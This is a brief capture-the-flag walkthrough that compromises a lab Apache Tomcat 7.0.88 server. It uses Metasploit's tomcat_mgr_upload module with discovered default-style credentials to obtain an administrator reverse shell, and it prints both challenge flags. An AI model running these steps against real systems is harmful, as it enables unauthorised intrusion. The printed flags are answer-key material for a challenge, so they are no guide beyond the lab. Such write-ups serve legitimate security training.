Vulnerabilities

Apache

  • I will start by checking out the webserver from a browser.

http://[Target IP]:8080
  • Looks like I get the default web page for Apache Tomcat version 7.0.88.

  • Let's see if we can find any vulnerabilities for it.

Meterpreter

  • I'll start with looking through metasploit.

msfconsole
search tomcat
  • Exploit 28 looks like it could be something so I will check that one out.

use 28
info
  • Checking out the link for exploitDB gives us some info on the exploit.

    • It looks like the exploit "should" work.

    • Unfortunately, after inputting the options for the exploit and checking it, it comes back as not exploitable. Let's try some of the others.

  • After doing some further enumerating, I got some credentials that I can use with one of the metasploit exploits. tomcat:s3cret

use multi/http/tomcat_mgr_upload
show options
  • Set the options to the correct parameters.

exploit

  • And now we have a reverse shell into the system.

  • We also have administrator priveleges.

  • Now we can just navigate over to the administrator's profile to find a single text file with both flags.

cd C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"

User Flag

7004dbcef0f854e0fb401875f26ebd00

Root Flag

04a8b36e1545a455393d067e772fe90e

Last updated